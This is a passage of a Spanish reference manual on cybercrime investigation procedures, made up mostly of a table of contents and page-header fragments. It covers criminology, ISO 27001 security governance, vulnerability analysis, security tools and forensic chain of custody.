
DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 17

1. Introducción a la Ciberdelincuencia. Tipologías del

2. Enfoque criminológico de la víctima del ciberdelito.................44

3. Prevención, intervención y persecución estratégica. .............60

4. Perfil delincuencial del cibercrimen............................................65

1. La seguridad de la información .....................................................77

2. Gobernanza y buenas prácticas de la seguridad de

3. El estándar ISO 27001..................................................................... 104

4. Modelos de madurez para la seguridad de la información ..109

5.La ISO 27005:2011 y su adaptación al NIS SP 800-30..................117

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 19

7. Detección y análisis de vulnerabilidades................................. 148

8. Herramientas de seguridad: IDS/IPS- DLP. PROXY y SIEM .......182

9. Blockchain, criptografía y seguridad de datos........................ 207

20 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

11. Big Data y Cloud Computing...................................................... 232

1. Normativa Tecnológica – Digital Internacional........................ 275

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 21

2.Tipología delictiva en cibercrimen. .............................................281

1. Introducción al Análisis Forense I.............................................. 345

2. Introducción al análisis forense II............................................... 376

22 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

3.El Laboratorio Pericial ...................................................................402

4. Proceso del análisis forense.......................................................424

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 23

6. Gestión efectiva de la cadena de custodia ............................. 469

24 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 25

• Por último, es importante destacar que hoy en día la mayoría de las

26 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

El uso diario de bizum aumenta hasta un 5% en la población de entre 18 y 24 años, mientras

Ilustración 2. Uso diario de medios de pago.

DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 27

Ilustración 3. Formas de delitos a partir del uso de las tecnologías